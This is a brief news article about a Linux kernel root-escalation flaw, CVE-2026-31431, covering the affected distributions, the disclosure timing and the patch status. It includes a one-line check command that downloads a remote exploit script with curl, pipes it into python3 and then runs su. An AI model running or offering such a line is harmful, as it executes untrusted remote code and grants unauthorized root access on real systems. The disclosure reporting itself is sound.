It is quite an interesting patch week for Linux systems administrators out there. Researchers at Xint Code have discovered a nasty exploit that instantly grants root access to any local unprivileged user, a nightmare scenario for multi-user servers of various types, including web servers, container environments like Kubernetes, CI/CD pipelines, and more.
The CVE-2026-31431 exploit affects pretty much every Linux distro currently in use and has existed since 2017. Although it's not a zero-day and the kernel has already gotten a patch, the short disclosure window gave distro makers relatively little time to react. Affected variants include (but aren't limited to) Ubuntu 24 (version 26 was just released last week), RHEL 10, SUSE 16, and Amazon Linux 2023. Even Windows' WSL2 is affected, and all it takes is 732 bytes to do it.
To check whether a system is vulnerable, you can just run "curl https://copy.fail/exp | python3 && su" from a standard unprivileged account. We should note that this pipes a remote script straight into python3, so you're trusting an online script. The source code for the proof-of-concept is available here if you prefer. If your distro doesn't have a patch available yet, you can try one of two mitigation methods.